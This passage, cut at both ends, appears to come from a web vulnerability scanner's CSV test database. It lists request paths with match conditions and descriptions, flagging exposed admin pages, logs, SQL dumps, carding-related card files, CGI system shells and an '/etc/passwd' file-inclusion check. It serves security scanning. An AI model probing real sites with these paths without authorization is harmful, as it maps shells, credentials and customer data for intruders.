interesting.\",\"\",\"\"\n\"001907\",\"\",\"1\",\"/users/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001908\",\"\",\"1\",\"/users/scripts/submit.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001909\",\"\",\"1\",\"/ustats/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001910\",\"\",\"1\",\"/usuario/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001911\",\"\",\"1\",\"/usuarios/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001912\",\"\",\"1\",\"/vfs/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001913\",\"\",\"1\",\"/w3perl/admin\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001914\",\"\",\"1\",\"/warez/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001915\",\"\",\"1\",\"/web/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001916\",\"\",\"1\",\"/web800fo/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001917\",\"\",\"1\",\"/webaccess.htm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001918\",\"\",\"1\",\"/webaccess/access-options.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001919\",\"\",\"1\",\"/webadmin/\",\"GET\",\"CODE:200\",\"This might be interesting: probably HostingController, www.hostingcontroller.com\",\"\",\"\"\n\"001920\",\"\",\"1\",\"/webboard/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001921\",\"\",\"1\",\"/webcart-lite/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001922\",\"\",\"1\",\"/webcart/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001923\",\"\",\"1\",\"/webdata/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001924\",\"\",\"1\",\"/weblog/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001925\",\"\",\"1\",\"/weblogs/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001926\",\"\",\"1\",\"/webmaster_logs/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001927\",\"\",\"1\",\"/WebShop/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001928\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"1\",\"/WebShop/logs/cc.txt\",\"GET\",\"CODE:200\",\"Seen in carding forums.\",\"\",\"\"\n\"001929\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"1\",\"/WebShop/templates/cc.txt\",\"GET\",\"CODE:200\",\"Seen in carding forums.\",\"\",\"\"\n\"001930\",\"\",\"1\",\"/website/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001931\",\"\",\"1\",\"/webstats/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001932\",\"\",\"1\",\"/WebTrend/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001933\",\"\",\"1\",\"/Web_store/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001934\",\"\",\"1\",\"/windows/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001935\",\"\",\"1\",\"/word/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001936\",\"\",\"1\",\"/work/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001937\",\"\",\"1\",\"/wstats/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001938\",\"\",\"1\",\"/wusage/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001939\",\"\",\"1\",\"/www-sql/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001940\",\"\",\"1\",\"/www/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001941\",\"\",\"1\",\"/wwwboard/wwwboard.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001942\",\"\",\"1\",\"/wwwboard/wwwboard.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001943\",\"\",\"1\",\"/wwwjoin/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001944\",\"\",\"1\",\"/wwwlog/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001945\",\"\",\"1\",\"/wwwstats.html\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001946\",\"\",\"1\",\"/wwwstats/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001947\",\"\",\"1\",\"/wwwthreads/3tvars.pm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001948\",\"\",\"1\",\"/wwwthreads/w3tvars.pm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001949\",\"\",\"1\",\"/zipfiles/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001950\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/_pages\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001952\",\"\",\"1\",\"@CGIDIRS.fhp\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001953\",\"\",\"1\",\"@CGIDIRSadd_ftp.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001954\",\"\",\"1\",\"@CGIDIRSadmin.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001955\",\"\",\"1\",\"@CGIDIRSadmin.php\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001956\",\"\",\"1\",\"@CGIDIRSadmin.php3\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001957\",\"\",\"1\",\"@CGIDIRSadmin.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001958\",\"\",\"1\",\"@CGIDIRSadminhot.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"001959\",\"\",\"1\",\"@CGIDIRSadminwww.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"001960\",\"\",\"1\",\"@CGIDIRSAnyBoard.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001961\",\"\",\"1\",\"@CGIDIRSAnyForm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001962\",\"\",\"1\",\"@CGIDIRSAnyForm2\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001963\",\"\",\"1\",\"@CGIDIRSash\",\"GET\",\"CODE:200\",\"This might be interesting: possibly a system shell found.\",\"\",\"\"\n\"001964\",\"\",\"1\",\"@CGIDIRSax-admin.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001965\",\"\",\"1\",\"@CGIDIRSax.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001966\",\"\",\"1\",\"@CGIDIRSaxs.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001967\",\"\",\"1\",\"@CGIDIRSbash\",\"GET\",\"CODE:200\",\"This might be interesting: possibly a system shell found.\",\"\",\"\"\n\"001968\",\"\",\"1\",\"@CGIDIRSbnbform\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001969\",\"\",\"1\",\"@CGIDIRSbnbform.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001970\",\"\",\"1\",\"@CGIDIRScart.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001971\",\"\",\"1\",\"@CGIDIRScgimail.exe\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001972\",\"\",\"1\",\"@CGIDIRSclassifieds\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001973\",\"\",\"1\",\"@CGIDIRSclassifieds.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001974\",\"\",\"1\",\"@CGIDIRSclickcount.pl?view=test\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001975\",\"\",\"1\",\"@CGIDIRScode.php\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001976\",\"\",\"1\",\"@CGIDIRScode.php3\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001977\",\"\",\"1\",\"@CGIDIRScount.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001978\",\"\",\"1\",\"@CGIDIRScsh\",\"GET\",\"CODE:200\",\"This might be interesting: possibly a system shell found.\",\"\",\"\"\n\"001979\",\"\",\"1\",\"@CGIDIRScstat.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001980\",\"\",\"1\",\"@CGIDIRSc_download.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001981\",\"\",\"1\",\"@CGIDIRSdasp/fm_shell.asp\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001982\",\"\",\"1\",\"@CGIDIRSday5datacopier.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001983\",\"\",\"1\",\"@CGIDIRSdfire.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001984\",\"\",\"1\",\"@CGIDIRSdig.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001985\",\"\",\"1\",\"@CGIDIRSdisplayTC.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001986\",\"\",\"1\",\"@CGIDIRSedit.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001987\",\"\",\"1\",\"@CGIDIRSenter.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001988\",\"\",\"1\",\"@CGIDIRSenviron.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001989\",\"\",\"1\",\"@CGIDIRSenviron.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001990\",\"\",\"1\",\"@CGIDIRSex-logger.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001991\",\"\",\"1\",\"@CGIDIRSexcite\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001992\",\"\",\"1\",\"@CGIDIRSfilemail\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001993\",\"\",\"1\",\"@CGIDIRSfilemail.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001994\",\"\",\"1\",\"@CGIDIRSftp.pl\",\"GET\",\"CODE:200\",\"This might be interesting: is file transfer allowed?\",\"\",\"\"\n\"001995\",\"\",\"1\",\"@CGIDIRSftpsh\",\"GET\",\"CODE:200\",\"This might be interesting: possibly a system shell found.\",\"\",\"\"\n\"001996\",\"\",\"1\",\"@CGIDIRSgetdoc.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001997\",\"\",\"1\",\"@CGIDIRSglimpse\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001998\",\"\",\"1\",\"@CGIDIRShitview.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001999\",\"\",\"1\",\"@CGIDIRSjailshell\",\"GET\",\"CODE:200\",\"This might be interesting: possibly a system shell found.\",\"\",\"\"\n\"002000\",\"CVE-1999-0260\",\"1\",\"@CGIDIRSjj\",\"GET\",\"CODE:200\",\"Allows attackers to execute commands as http daemon\",\"\",\"\"\n\"002001\",\"\",\"1\",\"@CGIDIRSksh\",\"GET\",\"CODE:200\",\"This might be interesting: possibly a system shell found.\",\"\",\"\"\n\"002002\",\"\",\"1\",\"@CGIDIRSlog-reader.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002003\",\"\",\"1\",\"@CGIDIRSlog/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002004\",\"\",\"1\",\"@CGIDIRSlogin.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002005\",\"\",\"1\",\"@CGIDIRSlogin.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002006\",\"\",\"1\",\"@CGIDIRSlogit.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002007\",\"\",\"1\",\"@CGIDIRSlogs.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002008\",\"\",\"1\",\"@CGIDIRSlogs/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002009\",\"\",\"1\",\"@CGIDIRSlogs/access_log\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002010\",\"\",\"1\",\"@CGIDIRSlogs/error_log\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002011\",\"\",\"1\",\"@CGIDIRSlookwho.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002012\",\"\",\"1\",\"@CGIDIRSmaillist.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002013\",\"\",\"1\",\"@CGIDIRSmaillist.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002014\",\"\",\"1\",\"@CGIDIRSman.sh\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002015\",\"\",\"1\",\"@CGIDIRSmeta.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002016\",\"\",\"1\",\"@CGIDIRSminimal.exe\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002017\",\"\",\"1\",\"@CGIDIRSnlog-smb.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002018\",\"\",\"1\",\"@CGIDIRSnlog-smb.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002019\",\"\",\"1\",\"@CGIDIRSnoshell\",\"GET\",\"CODE:200\",\"This might be interesting: possibly a system shell found.\",\"\",\"\"\n\"002020\",\"\",\"1\",\"@CGIDIRSnph-publish\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002021\",\"\",\"1\",\"@CGIDIRSntitar.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002022\",\"\",\"1\",\"@CGIDIRSpass\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002023\",\"\",\"1\",\"@CGIDIRSpasswd\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002024\",\"\",\"1\",\"@CGIDIRSpasswd.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002025\",\"\",\"1\",\"@CGIDIRSpassword\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002026\",\"\",\"1\",\"@CGIDIRSpost_query\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002027\",\"\",\"1\",\"@CGIDIRSpu3.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002028\",\"\",\"1\",\"@CGIDIRSratlog.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002029\",\"\",\"1\",\"@CGIDIRSresponder.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002030\",\"\",\"1\",\"@CGIDIRSrguest.exe\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002031\",\"\",\"1\",\"@CGIDIRSrksh\",\"GET\",\"CODE:200\",\"This might be interesting: possibly a system shell found.\",\"\",\"\"\n\"002032\",\"\",\"1\",\"@CGIDIRSrsh\",\"GET\",\"CODE:200\",\"This might be interesting: possibly a system shell found.\",\"\",\"\"\n\"002033\",\"\",\"1\",\"@CGIDIRSsearch.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002034\",\"\",\"1\",\"@CGIDIRSsearch.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002035\",\"\",\"1\",\"@CGIDIRSsession/adminlogin\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002036\",\"\",\"1\",\"@CGIDIRSsh\",\"GET\",\"CODE:200\",\"This might be interesting: possibly a system shell found.\",\"\",\"\"\n\"002037\",\"\",\"1\",\"@CGIDIRSshow.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002038\",\"\",\"1\",\"@CGIDIRSstat/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002039\",\"\",\"1\",\"@CGIDIRSstats-bin-p/reports/index.html\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002040\",\"\",\"1\",\"@CGIDIRSstats.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002041\",\"\",\"1\",\"@CGIDIRSstats.prf\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002042\",\"\",\"1\",\"@CGIDIRSstats/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002043\",\"\",\"1\",\"@CGIDIRSstatsconfig\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002044\",\"\",\"1\",\"@CGIDIRSstats_old/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002045\",\"\",\"1\",\"@CGIDIRSstatview.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002046\",\"\",\"1\",\"@CGIDIRSsurvey\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002047\",\"\",\"1\",\"@CGIDIRSsurvey.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002048\",\"\",\"1\",\"@CGIDIRStablebuild.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002049\",\"\",\"1\",\"@CGIDIRStcsh\",\"GET\",\"CODE:200\",\"This might be interesting: possibly a system shell found.\",\"\",\"\"\n\"002050\",\"\",\"1\",\"@CGIDIRStest.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002051\",\"\",\"1\",\"@CGIDIRStest/test.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002052\",\"\",\"1\",\"@CGIDIRStextcounter.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002053\",\"\",\"1\",\"@CGIDIRStidfinder.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002054\",\"\",\"1\",\"@CGIDIRStigvote.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002055\",\"\",\"1\",\"@CGIDIRStpgnrock\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002056\",\"\",\"1\",\"@CGIDIRSultraboard.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002057\",\"\",\"1\",\"@CGIDIRSultraboard.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002058\",\"\",\"1\",\"@CGIDIRSviewlogs.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002059\",\"\",\"1\",\"@CGIDIRSvisitor.exe\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002060\",\"\",\"1\",\"@CGIDIRSw3-msql\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002061\",\"\",\"1\",\"@CGIDIRSw3-sql\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002062\",\"\",\"1\",\"@CGIDIRSwebais\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002063\",\"\",\"1\",\"@CGIDIRSwebbbs.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002064\",\"\",\"1\",\"@CGIDIRSwebbbs.exe\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002065\",\"\",\"1\",\"@CGIDIRSwebutil.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002066\",\"\",\"1\",\"@CGIDIRSwebutils.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002067\",\"\",\"1\",\"@CGIDIRSwebwho.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002068\",\"\",\"1\",\"@CGIDIRSwguest.exe\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002069\",\"\",\"1\",\"@CGIDIRSwww-sql\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002070\",\"\",\"1\",\"@CGIDIRSwwwboard.cgi.cgi\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002071\",\"\",\"1\",\"@CGIDIRSwwwboard.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002072\",\"\",\"1\",\"@CGIDIRSwwwstats.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002073\",\"\",\"1\",\"@CGIDIRSwwwthreads/3tvars.pm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002074\",\"\",\"1\",\"@CGIDIRSwwwthreads/w3tvars.pm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002075\",\"\",\"1\",\"@CGIDIRSzsh\",\"GET\",\"CODE:200\",\"This might be interesting: possibly a system shell found.\",\"\",\"\"\n\"002076\",\"CVE-1999-1520\",\"12\",\"/adsamples/config/site.csc\",\"GET\",\"CODE:200\",\"Contains SQL username/password\",\"\",\"\"\n\"002077\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"1\",\"/advworks/equipment/catalog_type.asp\",\"GET\",\"CODE:200\",\"Seen in carding forums.\",\"\",\"\"\n\"002078\",\"\",\"1\",\"/carbo.dll\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002079\",\"https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt\",\"1\",\"/clocktower/\",\"GET\",\"CODE:200\",\"Microsoft Site Server sample files may have SQL injection.\",\"\",\"\"\n\"002080\",\"\",\"1\",\"/localstart.asp\",\"GET\",\"BODY:You are not authorized\",\"This might be interesting.\",\"\",\"\"\n\"002081\",\"https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt\",\"1\",\"/market/\",\"GET\",\"CODE:200\",\"Microsoft Site Server sample files may have SQL injection.\",\"\",\"\"\n\"002082\",\"https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt\",\"1\",\"/mspress30/\",\"GET\",\"CODE:200\",\"Microsoft Site Server sample files may have SQL injection.\",\"\",\"\"\n\"002083\",\"\",\"1\",\"/sam\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002084\",\"\",\"1\",\"/sam.bin\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002085\",\"\",\"1\",\"/sam._\",\"GET\",\"CODE:200&&!BODY:Forbidden\",\"This might be interesting.\",\"\",\"\"\n\"002086\",\"\",\"1\",\"/samples/search/queryhit.htm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002087\",\"\",\"1\",\"/scripts/counter.exe\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002088\",\"CVE-2002-1769\",\"76\",\"/scripts/cphost.dll\",\"GET\",\"CODE:200\",\"cphost.dll may have a DoS and a traversal issue.\",\"\",\"\"\n\"002089\",\"\",\"1\",\"/scripts/fpadmcgi.exe\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002090\",\"\",\"1\",\"/scripts/postinfo.asp\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002091\",\"\",\"1\",\"/scripts/samples/ctguestb.idc\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002092\",\"\",\"1\",\"/scripts/samples/search/webhits.exe\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002093\",\"\",\"1\",\"/site/iissamples/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002094\",\"https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt\",\"1\",\"/vc30/\",\"GET\",\"CODE:200\",\"Microsoft Site Server sample files may have SQL injection.\",\"\",\"\"\n\"002095\",\"\",\"1\",\"/_mem_bin/\",\"GET\",\"CODE:200\",\"This might be interesting: user login\",\"\",\"\"\n\"002096\",\"\",\"1\",\"/_mem_bin/FormsLogin.asp\",\"GET\",\"CODE:200\",\"This might be interesting: user login\",\"\",\"\"\n\"002097\",\"\",\"1\",\"/perl/files.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002098\",\"\",\"1\",\"/perl5/files.pl\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002099\",\"\",\"1\",\"/scripts/convert.bas\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002100\",\"\",\"1\",\"/owa_util%2esignature\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"002101\",\"https://en.wikipedia.org/wiki/Microsoft_FrontPage\",\"1\",\"/cgi-dos/args.bat\",\"GET\",\"CODE:200\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002102\",\"\",\"1\",\"/custdata/\",\"GET\",\"CODE:200\",\"This may be COWS (CGI Online Worldweb Shopping), and may leak customer data.\",\"\",\"\"\n\"002103\",\"\",\"1\",\"/hostingcontroller/\",\"GET\",\"CODE:200\",\"This might be interesting: probably HostingController, www.hostingcontroller.com\",\"\",\"\"\n\"002104\",\"\",\"2\",\"/data.sql\",\"GET\",\"CODE:200\",\"Database SQL?\",\"\",\"\"\n\"002105\",\"\",\"2\",\"/databases/\",\"GET\",\"CODE:200\",\"Databases directy found.\",\"\",\"\"\n\"002106\",\"\",\"2\",\"/database.sql\",\"GET\",\"CODE:200\",\"Database SQL found.\",\"\",\"\"\n\"002107\",\"\",\"2\",\"/db.sql\",\"GET\",\"CODE:200\",\"Database SQL found.\",\"\",\"\"\n\"002108\",\"\",\"2\",\"/etc/passwd\",\"GET\",\"@LFI()\",\"An '/etc/passwd' file is available via the web site.\",\"\",\"\"\n\"002109\",\"\",\"2\",\"/img-sys/\",\"GET\",\"CODE:200\",\"Default image directory should not allow directory listing.\",\"\",\"\"\n\"002110\",\"\",\"2\",\"/java-sys/\",\"GET\",\"CODE:200\",\"Default Java directory should not allow directory listing.\",\"\",\"\"\n\"002111\",\"\",\"2\",\"/javadoc/\",\"GET\",\"CODE:200\",\"Documentation...?\",\"\",\"\"\n\"002112\",\"\",\"2\",\"/log/\",\"GET\",\"CODE:200\",\"Ahh...log information...fun!\",\"\",\"\"\n\"002113\",\"\",\"2\",\"/manager/\",\"GET\",\"CODE:200\",\"May be a web server or site manager.\",\"\",\"\"\n\"002114\",\"\",\"2\",\"/manual/\",\"GET\",\"CODE:200\",\"Web server manual found.\",\"\",\"\"\n\"002115\",\"\",\"2\",\"/exchange/\",\"GET\",\"CODE:401\",\"This might be interesting: Outlook/Exchange OWA.\",\"\",\"\"\n\"002116\",\"\",\"3\",\"/pls/admin\",\"GET\",\"BODY:ENVIRONMENT\",\"Oracle Apache+WebDB gives a lot of system information via the pls/admin script\",\"\",\"\"\n\"002265\",\"\",\"1\",\"/finance.xls\",\"GET\",\"CODE:200\",\"Finance spreadsheet?\",\"\",\"\"\n\"002266\",\"\",\"1\",\"/finances.xls\",\"GET\",\"CODE:200\",\"Finance spreadsheet?\",\"\",\"\"\n\"002267\",\"\",\"1\",\"/abonnement.asp\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002268\",\"\",\"1\",\"/acartpath/signin.asp?|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown 